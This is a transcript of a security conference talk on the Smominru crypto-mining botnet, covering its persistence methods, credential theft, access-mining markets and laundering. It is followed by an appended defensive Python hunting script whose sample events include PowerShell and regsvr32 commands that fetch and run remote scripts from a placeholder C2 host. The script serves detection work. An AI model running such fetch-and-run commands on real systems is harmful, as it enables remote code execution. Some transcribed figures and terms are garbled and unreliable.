
2019 - Hidden Agenda: The darker side of cryptocurrency botnet mining - Greg Foss

BSides Denver, 31:44, published 2019-09
About this talk
Greg Foss stands up and discusses some of the current viruses and botnet practices being used.
Transcript [en]

...is going to talk about cryptocurrency botnets and all these other neat buzzwords in here, and actually make some sense out of it; we'll see him for 30 minutes and then you can, all right, all right. So I just want to give a cheers to ... Security and Joe for letting us crash their office for the day. Thank you guys. [Applause]

So today what I want to talk to you guys about is this botnet campaign that we've been tracking, and what kind of made this turn into something actually interesting that I think was worth at least putting some slides together, um, trim it, like polish it out, because I have 30 minutes. So we'll see if we even have time for questions, but I'll be around later. There's some stuff, like ways that we acquired some of this information, that we have to talk about offline, so we'll see when we get to Q&A. So, uh, to introduce myself: my name is Greg Foss, and I'm a principal threat researcher with Carbon Black, part of the Threat Analysis Unit. We see a lot

of traffic from the botnets; we build off the queries that you see within the whole Carbon Black product line, a lot of attack data as well. So anyone in here heard of Smominru? It's kind of an old, esoteric one; it's not too much of a presence in the United States, it's kind of predominantly Russia that's attacked, but it has now branched into the United States, so now we're actually seeing a lot more of it here. So Smominru is kind of interesting, right? This is not a new botnet by any means; this is one that kind of came out in late 2016, mid 2017. You know, since

that time frame there's just a new write-up that just came out, I want to say about a week ago, by ... Predominantly what this is is a crypto-mining botnet, just running XMRig and mining cryptocurrency on compromised Windows systems. So what's interesting about that, right? Well, we were the first to get into this; all the other intelligence that was out there just pointed to this being a basic commodity crypto miner. You know, they talk a little bit about the ability to spread by using EternalBlue, which is kind of the most advanced part. When we came across it and we actually really dug into

this, well, it didn't cover some of the really interesting, unique things that we found about this botnet that made it kind of more concerning. So I just wanted to highlight a couple of write-ups that are out there, because they're actually really good; they just walk through the evolution of this campaign, and to this day they're still evolving this campaign and expanding it in order to infect additional hosts and just to expand their own reach. So why should we care, right? Why should you care? This is a crypto miner versus, you know, something that's like leveraging the theft of information or something like that. Well, because companies are going to

handle these threats differently. So if you send someone a notification, so you're working for Carbon Black or essentially a vendor, we see all these different companies and how they handle their threats in various different ways. So if we tell them, oh, this is just like a PUA, like a potentially unwanted application, a crypto miner, they're just like, cool, let's uninstall it and move on. But the thing is, why this is important is that we really understand, like, looking at the whole aspect of how these systems become infected, what else comes in, like secondary payloads related to these pieces of malware. The fact is that this is actually doing a lot more than mining: it's using a lot

of living-off-the-land system components to maintain persistence, expand the reach into the whole organization and just the systems they've compromised. And so it's a lot more to clean out than to say, just remove the crypto miner; it's very obvious with this. So when we first came across this, we actually just had a customer who was doing a deployment, and the customer rolled out Carbon Black Defense and this flagged, and they're like, you know, we've got a miner, but what was weird was just all the other stuff that it had been doing. There's a lot of other activities that we were picking up from this, and they're like, is this right? Because we actually saw different actors

using the same C2 networks to interact with the hosts. So, kind of interesting. So first we thought this is like a drive-by download or something, how they got infected; we later found out that they are actually using SMB and WMI respectively to do spreading across hosts over the Internet and within the LAN once they get inside a company. So the initial dropper establishes persistence; you have multiple different mechanisms, and we'll dive into it a little bit here. Essentially, you know, there is the WMI event subscription, regsvr32, rundll32, all these abilities to establish persistence to multiple different C2 servers. They also did DNS poisoning; they did that so that they

could throw off analysts: when we're going to look up hosts and stuff that was involved, it pointed to something else and threw us off the trail. And they did all these things just to make sure they were maintaining this access and also maintaining privileged access to certain processes. And of course the crypto mining: they're just using XMRig, something you see very commonly.

XMRig is a very popular Monero cryptocurrency miner, and the reason it's so popular with malware is it uses the CPU, so if you infect hundreds of thousands of hosts and just mine using the CPU you can actually get a lot out of it. And they're also using EternalBlue to spread laterally within organizations and spread across the Internet as well. And one of the real interesting things here is you saw different people from Russia and China actually leveraging this back-connect access to actually do post-exploitation activities on these hosts, and it's kind of interesting; we'll get into that in a bit. But what this turned into is actually a much larger, what's known as a botnet spreader, essentially, where these

services where you can rent malware or services and actually purchase access into organizations, and we'll break down kind of that way back in as well. So, is it a commodity miner? No, definitely not a commodity miner. So they're using a lot of living-off-the-land techniques for persistence, provisioning remote access; they would also, you know, if they compromised a server over the Internet, they would immediately acquire block-level access, so it's become inaccurate. They also have an initial process of killing off every competing miner that was out there; they have a list of files that's constantly updated; they would check and they were just killing these off to make sure

that they were blacklisted on those hosts going forward, so it's only their mining software that would actually be able to run. And the real interesting part is exfiltrating sensitive data; we'll get into that in more detail in a bit. But multiple C2s, DNS poisoning, all that stuff. Now, who are they primarily going after? Mostly Russia; we saw a lot of people in India, China, kind of all over the place, not so much in the United States at this time. So this is from Proofpoint, from back when they put together this data. So this has now expanded quite a bit to actually include a lot of the United States; they're starting to spread and

continuing to kind of evolve their own coverage. Now what's interesting with this, in terms of like why the other write-ups didn't include a lot of details that we found here doing our analysis: we came up with a few different kind of scenarios that line up with what's happened both with this campaign, within the news, within the cryptocurrency industry, that kind of lead to why they've looked at expanding into different revenue streams using the same malware. So on the top here you can see the value of Monero over time; this is from the beginning of 2016 to July of this year, and you can see it shot up for a while and it's been out there

since. But the actual Smominru campaign has been active for a while; it really kicked off in like early 2017, and at the point where they got about like halfway through their mining operation, an ISP actually caught on to what they were doing and sinkholed one third of their entire mining traffic. So all of a sudden they lost this massive amount of revenue. Right up to this point they had mined over 8,000 Monero, upwards of, at the time, worth about three billion dollars. So they've made quite a bit of money just from mining, but at the same time you see the price of Monero starts to dip; they were just simple, all of a sudden you

know, maybe that's when they decided to shift tactics and start adding in the theft of information and resale of that data; that's another kind of tactic to, I guess, kind of expand their operation. But another interesting aspect here, you see MyKings. You know, heard about MyKings before? MyKings is a pretty massive campaign, and so this is actually a botnet spreader; this is one of these services where you can actually rent out and buy, you know, malware. This exists; we ended up dubbing it, essentially, access mining: you just buy your way into organizations, and a great place to do that is through the whole MyKings kind of network, and

what's interesting is we actually found a link between these two campaigns that actually shows that the guys who created Smominru actually were the founders of MyKings; we're able to definitely link them together. Kind of interesting. So what I wanted to show you guys is just a high-level overview of, like, this is actually everything that this one piece of malware is doing once it infects your system. Now we're not going to break down all of this because I only have 30 minutes, but it's crazy, right? There's a lot. So I'm gonna do some highlights; we'll just take a look at a couple of the fun stuff. Once

this is over I'm gonna play it all over. All right, so some highlights. So, the funny thing about this, like, as we looked at this every, you know, couple of days, they were changing the names of binaries, they were changing the hashes; every single system is updated with new hashes. So, like, can you use signature detection to stop this? This is something where there's too many different types of payloads and different methods that they've implemented to infect systems, but it was something where we look at the actual behavioral techniques, and we'll get to what they're actually doing. Some of the arsenal: a lot of this was PowerShell, and the funny thing about all the PowerShell

they're using, none of it's encoded. There's one piece that's an encoded PowerShell command, and it's the WMI event subscription creation; everything else is like plain text, and it's like they're not even trying to hide. Like, these guys do not care at all. One of the things they do that's kind of interesting is they repurposed a lot of existing libraries from other malware writers or existing Windows system components, and they ended up bringing their own versions of these files and switching them out on the host; we'll see what those are used for in a bit. There's Mimikatz, both the binary version and the PowerShell version; a lot of crypto miners, you know, sometimes

they would actually change miners, or they would do like weird stuff like injecting into other processes and mining from that, but a lot of this came down to, at the end of the day, it started with PowerShell and ended with PowerShell and VB scripts, and that's how they did their data collection and exfiltration. So what does this look like when you initially get infected? This is the initial command line that you'll see on an endpoint that's getting infected with Smominru; this is what it looks like when it comes in via EternalBlue. So someone scans, gets access, immediately executes this. We actually got a hold of their actual

original payloads that they were using, and we'll show that. But that first command there, that's just creating that WMI event subscription, and so they're trying to do this very first thing: establish that persistence, make sure they have a way back into the system. These next couple scripts, a lot of them just pull down different lists of files or other miners that they want to get, or other pieces of data that they're kind of interested in collecting, so they all have various specific jobs, and every time you run this these will be updated as well, so it'll pull from different hosts; these are changing kind of constantly. That's what goes next, like the DownloadString kind of sections

are highlighted. But then at the bottom, when you see regsvr32, that's using a fairly new method to establish persistence to, in this case, three different C2 servers, to pull those down and run them. And it's funny because they're not stages, like it says one, two, three; they're just literally like different C2s that it's pulling back to after it establishes persistence. So this first stage, some of the binaries that are actually dropped once the PowerShell executes are these three files, which are kind of the key here. And now at this point the names of these files have changed, so you know, it's something where every week we're kind of running through this and

modifying, you know, which these files are. But that one is just going to overwrite the Master Boot Record, so when we were detonating this within our early analysis we were finding it was crashing, and it was due to this, so we had to actually test this on some bare metal just to make sure we got the whole telemetry of all this happening. Here I'm gonna skip over this, but it's kind of a secondary payload that did a lot of the DNS poisoning and redirecting traffic. So as you're making requests, they would actually go through a .exe, or it would inject into another process, so

into control, and what we were able to do, look at that side. Well, this one is kind of where all of the other magic comes from; this is like the core binary that delivers everything else, and that ended up being more interesting in terms of what we have time to talk about here. The mining itself turned out to be actually like the most innocuous part of this whole thing. So, most funny is this miner actually sleeps for 14 hours after every time it starts up, so they want to wait till you're away, basically; they're definitely not touching the system while you're on it, and once you log into the host, you, you know,

move the mouse or something like that, it immediately stops, kills the process and just disappears entirely until the next time it starts up again. Now, this is where we get into remote access. Here this is just an example of one of the pages that has been called by this piece of malware, so as you can see here we're just running wscript with cmd.exe to use JScript to run all of our code here, which is just shellcode shoveling a shell out, and this is set up to run on jobs; this runs just scheduled over time to kind of maintain that access over time. So by the way, if you're looking for good new protections,

anytime you see JScript running anything like PowerShell, cmd, or executing a script, that's a solid indicator. But the next interesting thing is the EternalBlue piece. So anything out there on the open source, you know, after the Shadow Brokers leak and all that, all the tools came out and everything; so this is one of those repositories that kind of made some modifications so the tools that worked before were easier. But it's actually, they cloned the repo and added their own exploitation code to the actual EternalBlue payloads. So this is what it actually looks like; everything in here you see is exactly as it is within Megiddo except for this

part. So over here is just basically what's going to execute once you actually successfully exploit the system using EternalBlue. So over here, if you want to read through this, I think I can send this to you later, but essentially this is just running everything that we saw initially, you know, setting up the WMI persistence, establishing persistence on the host, basically making sure that they have a really good foothold on this host. Now where this gets really interesting, and where we started having a little too much fun with this, is when it gets into the part about access mining. So what access mining is, is essentially when you steal data from a host. So say you've compromised

this host: steal the usernames, passwords, domain information, and more direct access to the host, and then you take that data, push it up to a deep web market, park it and actually sell it directly. So, you know, buy direct access into an organization, buy credentials to a company; some of these are either just straight RDP open, but they also do a lot of math across these and look at, you know, how they're priced when they sell. So they will sell those for different values depending on the speed: you know, is this a fast processor, what's the network throughput, is this a main target organization? Some of those go for thousands of dollars. So this piece of

malware, the pieces kind of highlighted here are what actually does this. This script, the first PowerShell script, goes out and it downloads s.txt, which contains all the WMI persistence kind of mechanisms, and runs that; then it downloads another text file and kills all the processes listed within that; and then it downloads and executes the script called up.txt, and what up.txt does is it just swipes information on the host, yeah, those credentials, domain information, all that kind of stuff, and then it uploads it via FTP, just directly, to the C2 in plain text. So here's actually what that script looks like; it's funny, they didn't obfuscate any of this, so we were taking a look at

this, it's pretty straightforward, right? They're looking at: what's your external IP, what are the processes running on your host (and this is after they've killed them as well), what version of Windows are you running, calculate the memory capacity, CPU; you know, how they're going to price this later, with CPU information, basically, you know, is this gonna be a system for mining, or for something else. So then it goes on; this is the second half of the script here. So right here, anyone recognize this? PowerSploit, maybe? Yes, so it's just directly pulled out from their GitHub and executed. Then here they're just basically writing all this data to a raw

text file, and then here is where they upload over FTP. You see anything interesting here about that? Yeah, so like I said, these guys do not care, right? They don't care if we find it, or if someone else finds it; there are guaranteed other people monitoring these guys on top of us. So, you know, it's just kind of funny to see how open it is, as opposed to really trying to understand how they're trying to hide, how they're using encoding and stuff like that to evade. But just in our monitoring of this, we found over a hundred thousand unique infections from this one FTP

server. Now this was one FTP server out of six at the time, so there are multiple of these going to different locations, all uploading data in the same way. We looked at some of the other research work that was out there, so we've got over 500 thousand unique infections just within a week of this, so you can see how actually pretty large this campaign is for being such a simple piece of malware, for what they're doing. But this really gets back to, like, you know, when you have these potentially unwanted applications and things like that that you may not view as a big deal on your network, you do really want to

think about it as, like, you know, is this doing something else that I don't know about? What happened when this was loaded on my system? You know, you want to get that whole attack chain to understand and really make sure that you're not letting other aspects kind of slip by, because in this case a lot of the people that we talked to about this one in particular basically just removed the binary but still had all the existing persistence mechanisms in place, so something that was just completely missed. So, it's not stopping there. I want to go into mapping out the infrastructure of these guys. This is the

part I can't show kind of everything, because they're actually still actively doing some fun stuff with these guys; I'll cover the stuff that's kind of out there already. So this is one of the FTP servers; we're looking at just the historical data around that FTP server and a lot of their other infrastructure that we found. Initially we're thinking this is actually a Chinese campaign, because we saw a lot of Chinese malware, you know, within, yeah, EXIF data, some of the libraries we're looking at, and just some of the communications we saw on the back end that we may or may not have gotten into. Essentially, it's kind of interesting because this is actually just a

compromised server. We thought that this is one where, you know, this is one of many servers they took over, and they just started assigning their own DNS entries to these compromised servers in order to maintain their persistence. So once we started pulling the commonalities between them, we actually found this one, which is kind of interesting: bill kill me now at gmail.com. This address, if you do any research on this, you actually see they're tied to a lot of interesting stuff out there, including, so, not just the Smominru campaign, but they're also tied to MyKings, which, MyKings is a lot bigger; this is where it's actually getting into, you know, Russian, much

larger and, you know, nation-state-level kind of campaigns. And so tying these together is kind of interesting. We're actually able to find a gap in the historical registration for one of these domains, so mykings.pw used to be one of their main primary domains; they had a lot of kind of coordination with all the other MyKings kind of work. Well, you can see a bunch of these other ones are actually still active, but like, mykings.pw is kind of the one. Almost funny is that the guy actually let their private registration expire at one point, and so they had this gap where they actually got their email associated. The funny thing too is quickly after this they

switched, and all of a sudden it's a mail drop for us. So as soon as they saw this was exposed, they switched it and now it's still kind of the registrar again. So we decided to switch to phone numbers. Phone numbers are fun: you're trying to get across and see who owns these, and doing all of these, they came back to the same Russian phone number. Just kind of weird, right? It's not something that's even validated when you create a domain, so why use something that you actually, that they use the same across everything else, for whatever reason. How many of these? These are all the names associated with each of these. So this is

the phone number; it's a Russian phone number that's associated with all these registrations of domains. As for me, they usually reuse the phone number, but then these names, like NA or EF and stuff like that, so it's just kind of funny. We should call it now; how much does that cost to call Russia? But then there's the IPs: these are all the IPs that are associated with that same domain, so kind of interesting, right? So where does this go? This goes to a Moscow taxi company; like, this is what it looks like; there's like a little train station behind there and stuff. So, I don't know, it's just kind of weird

that they would sign up to use the same connection. We did find some other stuff, but I'd have to talk to you about that over beers later; for now just keep it to what's out there. So the physical location of these, the ones that are actually owned by the adversary, were all based in Russia; the other ones that we found were all compromised assets. So there are all those servers that, you know, within the United States, they've taken over quite a few of those; they're mostly IIS servers, and they were just going out, popping these servers and then deploying either FTP or their own web servers to them to handle different aspects of the

overall operation. The other aspect is kind of interesting: so bill kill me now is kind of the main email address that's associated with this campaign. We also found this one that's associated with almost all of the MyKings work but not the Smominru one; it's kind of interesting. This is kind of an interesting one, and that one we can talk about later. But so, access mining marketplaces: anyone here hang out on the deep web and, like, have run into any of these kind of places? So this one right here we were looking at is a login form to a remote desktop protocol shop. So what they're

selling here is just direct access into systems that are compromised over RDP. So a lot of these, you come into, some just give you an actual login form; one of these we found, they actually use Guacamole to display their interface when you log into their server, like it's pretty legit; it's like better than some commercial stuff that's out there. This is what the actual page looks like, like buying access to these systems. So over here you see the IP, and actually when you purchase you'll get the whole IP; they won't show it to you until then, because they don't want you to just go pop it yourself. But it shows

the country, shows state, city, zip code, even shows the OS, RAM, speed, all that kind of stuff, and then it's all priced accordingly based on... All right, I got 30 seconds, 29 seconds, so okay. Overall we saw a majority of these are about five dollars; there are some, you know, in the middle range, like twelve dollars or so, which seemed to be kind of average for like a pretty decent host to get access to, and this is across all of the access mining marketplaces and not just the RDP one. So, kind of interesting, but over time we're seeing this steadily increase in terms of the amount of systems that are available and the price, so it was definitely something

that we're seeing kind of growing in terms of a service offering, if you will. But the very last piece I wanted to touch on is what they're actually doing with the cryptocurrency. Anyone here play around with tumblers, Bitcoin tumblers, stuff like that? Well, the one I chose to highlight is this one specific for Monero. So basically, this is pre-laundered coins: you can push the Monero to this and then hit the client, and then you can get different types of coins out of it; this makes it really easy to launder that money. So it's kind of one of the ways they're gonna shuffle the coins through, push it down to a wallet, transfer it over

to another wallet, actually take money out. Now, of course there's stuff like chain analysis. Any questions? All right, perfect, I'm gonna keep going. Basically, once again, very short; like, it's hard to condense all this down. This is originally like a couple-hour briefing to run through, but essentially all of this is rapidly changing. It shows kind of that need to really focus on, you know, it may just come off as a PUA or adware or something like that, but oftentimes it has all these ulterior motives associated with it, to make it more profitable for the person who owns the botnet. So we definitely want to look into all of these things and treat them all kind of with the same level of regard. So that's

kind of the main point here. But if you want to read more about this, we actually have threat intelligence on this; we have some posts on our customer portal as well that go through like some queries of things they can use to find this activity, and then we have a white paper that talks more about the larger aspect of access mining in general.
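The behaviours the talk walks through (a script host launching PowerShell as a "solid indicator", regsvr32 pulling stages from C2 servers, the single encoded PowerShell command that creates the WMI event subscription, and plain-text PowerShell downloads) are what a defender would hunt for in process telemetry. The following is an added example, not code from the talk or from Carbon Black: a Python hunt over constructed Sysmon-style process-creation events, where the hostnames, file paths and the c2.example.invalid URL are constructed placeholders.

```python
# Added example (not from the talk or Carbon Black): hunt constructed Sysmon-style
# process-creation events for the living-off-the-land behaviours the talk describes.
import base64
import re
from collections import namedtuple

ProcessEvent = namedtuple("ProcessEvent", "host parent_image image command_line")  # Sysmon EID 1 subset

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}   # Windows Script Host binaries
SHELLS = {"powershell.exe", "cmd.exe"}
# Class names / cmdlet seen when a permanent WMI event subscription is created from PowerShell
WMI_SUBSCRIPTION_MARKERS = (
    "__eventfilter", "commandlineeventconsumer", "activescripteventconsumer",
    "__filtertoconsumerbinding", "set-wmiinstance", "root\\subscription",
)
REMOTE_FETCH = re.compile(r"downloadstring|downloadfile|invoke-expression|\biex\b")
ENCODED_FLAG = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.I)

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def encode_powershell(script):
    """Encode a script as powershell.exe -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(command_line):
    """Decoded -EncodedCommand payload, or None when absent or not valid base64/UTF-16LE."""
    m = ENCODED_FLAG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def script_host_spawns_shell(ev, cmd):
    # the talk's indicator: a script host (wscript) launching PowerShell or cmd
    return basename(ev.parent_image) in SCRIPT_HOSTS and basename(ev.image) in SHELLS

def regsvr32_remote_scriptlet(ev, cmd):
    # regsvr32 registering a scriptlet fetched from a remote (C2) URL
    return basename(ev.image) == "regsvr32.exe" and re.search(r"/i:https?://", cmd) is not None

def wmi_subscription_via_powershell(ev, cmd):
    # the one encoded command in the campaign: creating the WMI event subscription
    return basename(ev.image) == "powershell.exe" and any(k in cmd for k in WMI_SUBSCRIPTION_MARKERS)

def plaintext_remote_fetch(ev, cmd):
    # unencoded PowerShell pulling further stages over HTTP
    return (basename(ev.image) == "powershell.exe" and "http" in cmd
            and REMOTE_FETCH.search(cmd) is not None
            and decode_encoded_command(ev.command_line) is None)

RULES = [script_host_spawns_shell, regsvr32_remote_scriptlet,
         wmi_subscription_via_powershell, plaintext_remote_fetch]

def hunt(events):
    """Return (host, rule name) for every rule that fires, in event and rule order."""
    hits = []
    for ev in events:
        decoded = decode_encoded_command(ev.command_line)
        # match rules against the command line with any encoded payload appended in the clear
        cmd = (ev.command_line + (" " + decoded if decoded else "")).lower()
        hits.extend((ev.host, rule.__name__) for rule in RULES if rule(ev, cmd))
    return hits

# Constructed sample events; hosts, paths and c2.example.invalid are placeholders.
WMI_SCRIPT = ('Set-WmiInstance -Namespace root\\subscription -Class __EventFilter '
              '-Arguments @{Name="x"; Query="SELECT * FROM __InstanceModificationEvent"}')
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    ProcessEvent("ws01", "C:\\Windows\\System32\\wscript.exe", PS,
                 "powershell.exe -nop -w hidden -EncodedCommand " + encode_powershell(WMI_SCRIPT)),
    ProcessEvent("ws01", "C:\\Windows\\System32\\cmd.exe", "C:\\Windows\\System32\\regsvr32.exe",
                 "regsvr32 /s /n /u /i:http://c2.example.invalid/stage.sct scrobj.dll"),
    ProcessEvent("ws02", "C:\\Windows\\System32\\cmd.exe", PS,
                 "powershell -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/k.txt')\""),
    ProcessEvent("ws02", "C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\notepad.exe", "notepad.exe notes.txt"),
]

if __name__ == "__main__":
    for host, rule in hunt(SAMPLE_EVENTS):
        print(f"{host}: {rule}")
```

Because the WMI persistence is the one encoded piece the talk mentions, the hunt decodes any -EncodedCommand payload (UTF-16LE base64) before matching, which is what lets the subscription rule fire on the first sample event while the benign notepad launch produces no hit.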